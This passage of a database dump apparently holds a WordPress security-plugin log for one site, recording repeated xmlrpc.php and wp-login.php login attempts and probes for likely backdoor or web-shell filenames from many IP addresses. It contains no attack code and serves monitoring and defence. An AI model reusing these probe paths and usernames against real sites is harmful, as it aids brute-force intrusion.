5.115.173',337212333,'',0,1666076301.4148,55,'9ZcmF271SWUDwGVp3EPQdgyj','','19|0|0|0|cteisys.com/alfindex.php',0,19,0),('20.25.115.173',337212333,'',0,1666076235.3595,100,'exlZocjLqISgVnwrkD1Ez0Fp','','13|0|0|0|cteisys.com/th3_err0r.php',0,13,0),('20.25.115.173',337212333,'',0,1666076230.6422,100,'yUSiMjVbPRqkTpGmwlaDu2LI','','13|0|0|0|cteisys.com/larva.php',0,13,0),('81.88.52.210',1364735186,'newd',0,1666072728.4277,152,'o9j8gCTlrBMti7aY2W1dGLEw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.154.234.6',3483036166,'newd',0,1666072408.0084,152,'HnekX14L6PxZCYFSVyQKDINb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.84.42.54',575941174,'newd',0,1666072123.6247,152,'kFzgpsxbwe8C0YXnSdT4vc9h','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.225.94.95',601972319,'newd',0,1666071820.5560,152,'Xw2geDc50bojRIClUNuS1YaT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.233.37.202',233383370,'newd',0,1666071525.7824,152,'DN0nYaiWl98omH4KZQLCywk5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.81.8',2813088008,'newd',0,1666070692.2289,152,'AcaNioKR1f2eFGUbWO6xjLPH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.52.160.32',2973016096,'newd',0,1666070436.1163,152,'dNq081n53BwzVuvRGhT2rCXL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.104.44.58',3110612026,'newd',0,1666070174.3318,152,'lSo6Ep9mH2ue1q7gfxiJYRIN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.205.115',2160577907,'newd',0,1666069617.0375,152,'AZCuXsGN6E1ltTLpagoc4Yhq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.25.115.173',337212333,'',0,1666076226.1693,100,'dYPvCk2uoAebx15TItcQFinq','','13|0|0|0|cteisys.com/wpindex.php',0,13,0),('20.25.115.173',337212333,'',0,1666076220.9598,100,'XA9v1QNR3rEpM5YnVtq7ewOZ','','13|0|0|0|cteisys.com/xmlrp.php',0,13,0),('20.25.115.173',337212333,'',0,1666076199.1116,100,'4Ou5cPo7yrtAjMsgLJvl6nHp','','13|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('20.25.115.173',337212333,'',0,1666076036.1953,55,'qK1n85fe6SNItHJk7u9dmvbV','','19|0|0|0|cteisys.com/wp-content/db_cache.php',0,19,0),('20.25.115.173',337212333,'',0,1666075993.4421,55,'EXok5CQIUpJms0h64xatqgMP','','19|0|0|0|cteisys.com/wp-content/plugins/backup_index.php',0,19,0),('20.25.115.173',337212333,'',0,1666075992.7407,10,'uPaZgbrIHDqdQm9XTCl3t5JY','','707|0|0|0|cteisys.com/boom.php',0,707,0),('20.25.115.173',337212333,'',0,1666075992.7362,55,'uPaZgbrIHDqdQm9XTCl3t5JY','','19|0|0|0|cteisys.com/boom.php',0,19,0),('20.25.115.173',337212333,'',0,1666075912.3242,55,'GfDhvSQ0xLtIM5CN1JsaTBe8','','19|0|0|0|cteisys.com/admin.php',0,19,0),('194.56.190.57',3258498617,'newd',0,1666075908.8291,152,'Q0muxS8MkPj6opafKrAcZY2U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.25.115.173',337212333,'',0,1666075665.9957,55,'nwDKXNx5tQZFy3cTiUSq6plW','','19|0|0|0|cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php',0,19,0),('103.116.16.173',1735659693,'newd',0,1666075561.1883,152,'J1L2V8PSjbrlmufoTMnpgZzE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.25.115.173',337212333,'',0,1666075560.4365,55,'lakzRIOGdSAEKQCnhtVFPbMH','','19|0|0|0|cteisys.com/moduless.php',0,19,0),('20.25.115.173',337212333,'',0,1666075548.8564,55,'PTdtQacKSnBh3b1kHyvWMmui','','19|0|0|0|cteisys.com/style.php',0,19,0),('13.233.37.202',233383370,'newd',0,1666075227.8985,152,'0P1LH4RAXzOJc7E5DyY8CTVj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.233.37.202',233383370,'newd',0,1666074596.1249,152,'FCXpDqkJThNg6RSyVnQjubZB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.159.57.26',866072858,'newd',0,1666074286.4140,152,'MdU4NCyXHpRvgZcaA1ekQErn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.216.37',2806503461,'newd',0,1666073952.5312,152,'MH3lLdbJ0R54C9DF1KfOI8vi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.143.243.10',579859210,'newd',0,1666073648.3600,152,'7ZLPlVYo14ydRbqrc6AuhtQN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.164.193.195',3164914115,'newd',0,1666073354.8708,152,'0CvRjHspdIK6riAGOEZyFaJD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.25.115.173',337212333,'',0,1666076879.7916,55,'6NERxezChP0WLQOn2rGy9AZw','','19|0|0|0|cteisys.com/wp-includes/config.bak.php',0,19,0),('20.25.115.173',337212333,'',0,1666076849.4330,55,'fpYIuFMAbo3SRCVLcX8GhtD4','','19|0|0|0|cteisys.com/wp-content/config.bak.php',0,19,0),('20.25.115.173',337212333,'',0,1666076824.4881,55,'sK4Q5Na1DWOyLp3izIo0rEX6','','19|0|0|0|cteisys.com/wp-admin/config.bak.php',0,19,0),('20.25.115.173',337212333,'',0,1666076810.7689,55,'B42AC6D5kwrK8h0uRvtIeJq9','','19|0|0|0|cteisys.com/config.bak.php',0,19,0),('20.25.115.173',337212333,'',0,1666076785.0490,55,'VmxZw1iSeNjz3ocY9yuTgILW','','19|0|0|0|cteisys.com/old-index.php',0,19,0),('20.25.115.173',337212333,'',0,1666076764.5636,55,'2efw9xJh6RpIKLXWdA7O0oQH','','19|0|0|0|cteisys.com/wp-includes/css/css.php',0,19,0),('20.25.115.173',337212333,'',0,1666076634.8747,55,'CO1ZeGV59LbE2R3thXUYNFlH','','19|0|0|0|cteisys.com/wp-includes/fonts/css.php',0,19,0),('20.25.115.173',337212333,'',0,1666076624.2798,55,'ta2Gwk81IhmM6BsTQ5vSYqOD','','19|0|0|0|cteisys.com/wp-1ogin_bak.php',0,19,0),('20.25.115.173',337212333,'',0,1666076579.5441,55,'s1XW5ZEByUGg6Yj7nixHfLR3','','19|0|0|0|cteisys.com/wp-content/wp-1ogin_bak.php',0,19,0),('168.119.227.50',2826429234,'newd',0,1666076572.8078,152,'YxILtn42oJuFchOzUyQZPK0j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.116.16.173',1735659693,'newd',0,1666083915.1631,152,'Zyjmvfew67zA0sPdrgWMNFuO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'newd',0,1666083165.6699,152,'eh67VuOn3KyTjMD0Nm95qWPX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.119.182',861501366,'',0,1666082739.3746,55,'lzkuYL5gTbW2ErCH7NnUGjhJ','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('51.89.119.182',861501366,'',0,1666082734.7915,55,'xuPrG9q0zpWoRQUvbfahBlmj','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('35.195.135.67',600016707,'newd',0,1666082378.9352,152,'DYChwALu9djNp7nfFZItP3sV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.158.12.83',2090732627,'newd',0,1666081620.2375,152,'JVE46ud8oWFlMXnAkcB2IQPm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.230.247.143',2531719055,'newd',0,1666081265.9830,152,'tJgaS1OZdbRVMw2uQxm9oPFH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.221.220.140',1742593164,'newd',0,1666080880.0713,152,'Kny7NvocZl8tkHWI1MeisBpD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.74.17.225',793383393,'newd',0,1666080121.9790,152,'svtARHX0CSfqUlcDge7jwyEp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.110.176.116',2406396020,'newd',0,1666087060.6235,152,'v5jBfdPKYqe0nxEHwFRcViTG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.12.254.32',3322740256,'newd',0,1666086671.0529,152,'P0CQ3GVu6shjvFYLA7MNzxn4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.235.40.122',787163258,'',0,1666086341.4499,55,'Z2og7AGEpvWB4jRxNJPDfw8e','','19|0|0|0|cteisys.com/images/izanami.php',0,19,0),('46.235.40.122',787163258,'',0,1666086326.2813,55,'eMjNfQBwAU3JXV9ZrRuiFT1v','','19|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('188.164.193.195',3164914115,'newd',0,1666084713.9260,152,'J91NcfHoRWdSYlaw7GD40iCO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.22.89.6',2769705222,'newd',0,1666084305.1574,152,'UeyF1GX5CmgJMiDd0sHljNw3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.79.125',2813087613,'newd',0,1666090265.5048,152,'5aTAXKIQsJlheF18RfrpyNzD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.136.54.132',3330815620,'newd',0,1666089880.4612,152,'rYvbt5M61wNh2gRKzne7jH3m','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.192.246.33',3569415713,'',0,1666089671.0364,55,'k6VU9XyTmexrwiQo1qDtjcpv','','19|0|0|0|cteisys.com/about.php',0,19,0),('167.71.111.16',2806476560,'newd',0,1666088264.4972,152,'Mt6n2rIxRGOHTm9Zs1dAVqzD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.235.231.20',1089201940,'newd',0,1666087466.4242,152,'j3x4ZCmzctWlGqOvT9rEXDbU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.244.77.192',1760841152,'Joyce',0,1666087362.5089,51,'U4TqmNuHoERYv59kjlrehGLV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.255.64.58',872366138,'newd',0,1666094058.3441,152,'KotpTcs7eCdzEnvUaBFymQgJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.136.54.132',3330815620,'newd',0,1666093208.2013,152,'eDWxY4oUTQwc9ZOS6vgdX8yN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.62.155.4',1950259972,'newd',0,1666092764.0814,152,'f8YlFQZoPy54AtSEjXa2RdKB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.82',90545490,'',0,1666092429.5252,55,'wTvP7Ve2S4Mi8B1fkc0ZKALD','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('150.230.247.143',2531719055,'newd',0,1666091951.7533,152,'MJDA6N1iw5Ergc7lCkLhnuSm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.77.135.125',1347258237,'newd',0,1666091516.2175,152,'oagiYvZMuhmeGT92DArt1765','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.76.51.29',1347171101,'',0,1666098051.3294,55,'udkCxDtHE51XosWmzLeK8T2P','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('80.76.51.29',1347171101,'',0,1666098048.9636,55,'M081tHjsLBcDEOJWFdhry2SC','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('80.251.219.111',1358682991,'admin',0,1666096788.0641,152,'x3n2rkPeNYtowJgSICBfhbUj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.230.247.143',2531719055,'admin',0,1666096361.5248,152,'wz4pT8eqr0xVl7RjUtfMWg5O','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.225.151',1218961815,'newd',0,1666095728.0334,152,'wQLZYEf2czntlJjKTbS9rBIM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'Joyce',0,1666095337.1253,51,'LdPqhN7XpOQsKDTb5lkUMfHr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('110.42.210.9',1848300041,'newd',0,1666094446.7395,152,'XVeNbIglUGT3mHivsxrtMBoA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.210',1364735186,'wwwadmin',0,1666099689.8336,51,'sn5b1wLTKq2W7fomudrMjJCN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.31.46.140',1428106892,'',0,1666099145.4645,55,'pWhyTUOFSbqQw13B7Mo2zN0u','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('85.31.46.140',1428106892,'',0,1666099141.1001,55,'7tkECDvBHoQy219JrgGLO5wp','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('18.229.212.101',317052005,'wadminw',0,1666098828.7648,51,'nYI7QUq40hXSmGwfuFd8xic6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.128.54.239',2994747119,'newd',0,1666098072.8161,152,'n0DJocXr2U3LIYfQxG7pSvCO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('14.116.220.93',242539613,'',0,1666107890.6001,18,'0uP9qkWIN1majYULcnVi4x6G','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.116.220.93',242539613,'',0,1666107890.5992,71,'0uP9qkWIN1majYULcnVi4x6G','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.116.220.93',242539613,'',0,1666107888.8940,71,'E0LjIH6tJR8blrf1vTzcOkoS','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.116.220.93',242539613,'',0,1666107886.9836,71,'8CbT32FzfwESBWo47edVPKnx','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.116.220.93',242539613,'',0,1666107885.4196,71,'I7NZcjqKC2GPahd3nQROUimS','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.116.220.93',242539613,'',0,1666107883.6039,71,'oqLBRQXNmCpOWglVJTfykde9','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.116.220.93',242539613,'',0,1666107881.5259,71,'l1in3zdGJOCY2vuNmcsgAorL','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.116.220.93',242539613,'',0,1666107879.5933,71,'wKOMphHQktGJRoX38vxN9dir','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.116.220.93',242539613,'',0,1666107876.8986,71,'ibXGkUVwdJ6CnsEeA7YItxDr','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('104.244.77.192',1760841152,'Joyce',0,1666103032.9190,51,'utmV60zC2JoNy38PH1l7eWpf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('14.116.220.93',242539613,'',0,1666107874.4484,71,'XFR0AecPC5DS7d1vwyjqBfpk','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.116.220.93',242539613,'',0,1666107873.1788,71,'LIVOAemHUuyJCoi6bpzGrjXd','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.116.220.93',242539613,'',0,1666107871.7289,71,'9eNLcM8rdQD6qO7jPvyfmWlS','','13|0|0|0|www.cteisys.com/xmlrpc.php',0,13,0),('14.116.220.93',242539613,'',0,1666107870.8494,10,'uRDrcHnk1sj59pW0eitwybvA','','701|0|0|0|www.cteisys.com/xmlrpc.php',0,701,0),('14.116.220.93',242539613,'newd',0,1666107870.8439,152,'uRDrcHnk1sj59pW0eitwybvA','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.116.220.93',242539613,'newd',0,1666107869.7573,152,'Lsew42SiQVDb3ugWUltXf8GC','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.116.220.93',242539613,'newd',0,1666107868.3913,152,'swnhXySAGBfRV78c52aYEr04','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.116.220.93',242539613,'newd',0,1666107867.2894,152,'qiO3YEvL7FaMxpBmIrZKkhA2','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('14.116.220.93',242539613,'newd',0,1666107866.2023,152,'jLXZNIp9F5BgSR68iDadrTky','','0|0|0|0|www.cteisys.com/xmlrpc.php',0,0,0),('167.172.79.125',2813087613,'newd',0,1666106719.7125,152,'wic0qyG6HXjaEJoxTCl1D7UZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('196.44.176.39',3291263015,'newd',0,1666106279.3614,152,'JiXzOD3yGBdlSC6I5nxNHswp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.54.239',2994747119,'admin',0,1666105803.3495,152,'bqGryeEvH27Vh9kP1DKzjYO5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.105.75',2703452491,'newd',0,1666111922.2965,152,'oMvOyqbs0eXihT8NPt6LJYul','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.87.224.231',844620007,'newd',0,1666111677.8421,152,'WSwAzpUoH5B2KkIMLhr0NsDQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.187.74.213',532368085,'newd',0,1666111341.3732,152,'eTjdCKEU6sFNqWQVPmpGtgnY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.216.173',2733758637,'newd',0,1666109831.4342,152,'UKG5BicWr0nwIk4PMoCDRuSL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.158.12.83',2090732627,'newd',0,1666109503.8897,152,'bxRiUqElrStzfAv60oKjcpdI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.8.58.8',1997027848,'newd',0,1666109153.9080,152,'PXMk6Ra95oDV4O1BiTjy7NCI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.149.241.246',3029725686,'newd',0,1666113131.0172,152,'PVbQUhjtDOf5ZFk16yxgnlCR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.30.36.73',3558745161,'newd',0,1666112896.4937,7,'LeFyIdl5SnuMN38gfqwbZaxi','','0|0|0|0|cteisys.com//wp-login.php',0,0,0),('212.30.36.73',3558745161,'newd',0,1666112894.5298,152,'B8mhVisyDMtI49TeSN1KOC2q','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('72.167.225.151',1218961815,'newd',0,1666112827.6765,152,'098HuW3oeZFKycrEPfqwzg42','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.131.68.19',1753433107,'newd',0,1666143827.7213,7,'Lm9qwBtRHuhOcyid7Q68TlJF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.187.58.136',599472776,'newd',0,1666141589.0441,7,'lmxWv4i5shepzoBLag7qVYXj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.4.107',2671838315,'',0,1666141519.4583,18,'2SKOU4VvN8WqbD5XwCPR19ar','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141519.4578,50,'2SKOU4VvN8WqbD5XwCPR19ar','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141518.2573,18,'xgBevN9mQOypITobljCYSPGa','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141518.2568,50,'xgBevN9mQOypITobljCYSPGa','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141516.9191,18,'YZWPK7kIhq1S3RzHLjQUb0Af','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141516.9187,50,'YZWPK7kIhq1S3RzHLjQUb0Af','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141515.7596,18,'0u4sjv5HgL2UaDxePWyQ7rkI','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141515.7592,50,'0u4sjv5HgL2UaDxePWyQ7rkI','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141514.6356,18,'1oKcHvmyY48RqCuX6hVSfW0E','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141514.6353,50,'1oKcHvmyY48RqCuX6hVSfW0E','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141513.5239,18,'Xzk8fMpgs6QJAeVG9bP4onDi','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141513.5235,50,'Xzk8fMpgs6QJAeVG9bP4onDi','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141512.3558,18,'1I3bHDWe8pYUAanjEgf97Qcx','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141512.3555,50,'1I3bHDWe8pYUAanjEgf97Qcx','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141511.0432,18,'VCKgTiv0WpleIGr3HQMB6Zb4','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141511.0428,50,'VCKgTiv0WpleIGr3HQMB6Zb4','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141509.7597,18,'VZFTsaixcodR9JOU18PAgeIz','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141509.7592,50,'VZFTsaixcodR9JOU18PAgeIz','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141508.5085,18,'3kbTglhJ2rXfYjy76FoeRQtd','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141508.4949,50,'3kbTglhJ2rXfYjy76FoeRQtd','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141507.3288,18,'kqrV0CcPJ4AEMvDTX2O7I8K1','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141507.3284,50,'kqrV0CcPJ4AEMvDTX2O7I8K1','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141506.1187,18,'ENhRUtQMYg198SPAv6fFdsLu','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141506.1182,50,'ENhRUtQMYg198SPAv6fFdsLu','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141504.8875,18,'3wvnjNquST54aGfp6sQYc2IZ','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141504.8610,50,'3wvnjNquST54aGfp6sQYc2IZ','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141502.9943,18,'BQe4qiFCyLX2dSuJ8UIKzAT3','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141502.9934,50,'BQe4qiFCyLX2dSuJ8UIKzAT3','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141501.6950,18,'zqpCK54BscoIdG23mgTxZftX','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141501.6945,50,'zqpCK54BscoIdG23mgTxZftX','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141500.3389,18,'34nPkmyUBaS0FC6h9i5GLoTr','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141500.3383,50,'34nPkmyUBaS0FC6h9i5GLoTr','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141499.2374,18,'yiSbr6mLTR0JYWzEFvf57K1u','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141499.2370,50,'yiSbr6mLTR0JYWzEFvf57K1u','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141498.0986,18,'j0GAoaQn9rJ18TlRd2bCc7uB','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141498.0981,50,'j0GAoaQn9rJ18TlRd2bCc7uB','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141496.9694,18,'1QL7u3eY6BV4lM0XtS5PjRFE','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141496.9691,50,'1QL7u3eY6BV4lM0XtS5PjRFE','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('37.120.142.157',628657821,'newd',0,1666128239.3346,152,'AYg63VnzMoayUC8jd5vmK40J','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('159.65.4.107',2671838315,'',0,1666141495.8113,18,'sNdD8PrzEiytw2YBkxb4mX0S','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141495.8108,50,'sNdD8PrzEiytw2YBkxb4mX0S','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141494.6719,18,'SXx7YLlJym5jFWHqevbUgdRG','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141494.6713,50,'SXx7YLlJym5jFWHqevbUgdRG','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('205.185.116.156',3451483292,'Joyce',0,1666133001.3099,51,'YCeKt1uQja43kdqnyzRpgTsI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.191.40.94',1438591070,'newd',0,1666132739.0665,7,'1OelFvfTx6MZ79KktrUzjo4p','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.4.107',2671838315,'',0,1666141493.4668,18,'xJT4lhfIb6SQ8j2gRn9KHD5N','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141493.4665,50,'xJT4lhfIb6SQ8j2gRn9KHD5N','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141492.3412,18,'fVbhFE2uQmAqxWGvscgHrjBO','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141492.3408,50,'fVbhFE2uQmAqxWGvscgHrjBO','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141491.2327,18,'yEFalD26XgqCUsf5MznA7OZV','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141491.2323,50,'yEFalD26XgqCUsf5MznA7OZV','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141490.1323,18,'083XM9aOgjl5NL2ZStDkzmGw','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141490.1317,50,'083XM9aOgjl5NL2ZStDkzmGw','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141488.8254,18,'GRzWdMtOAb1p9xIQcZlgmhFX','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('159.65.4.107',2671838315,'',0,1666141488.8233,50,'GRzWdMtOAb1p9xIQcZlgmhFX','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141487.7404,18,'uK0vdGfr4Mh12BkJRiqmVPOC','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('51.178.138.5',867338757,'newd',0,1666137163.3637,7,'seSOyvUrw8PEXlkpGiRHKJBD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.21.38.119',3390383735,'newd',0,1666134957.4801,7,'JPD4bLMhSyzQg5E87ktVXRNi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.4.107',2671838315,'',0,1666141487.7400,50,'uK0vdGfr4Mh12BkJRiqmVPOC','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141486.2001,50,'Az4I8hYN0ZKbSJCVqdo2Wxe5','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141484.6549,50,'SkdF1LAZRnaCqQmrE5DGwch6','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141481.3470,50,'8uD3cvfg1ZLFem7BIMVG4XJb','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141483.0942,50,'E3FCAizMv5tN7914paKGwJLe','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141479.7941,50,'MYlgWX3yN7GArZBpJnu2PHvc','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('185.2.5.31',3103917343,'newd',0,1666139360.2544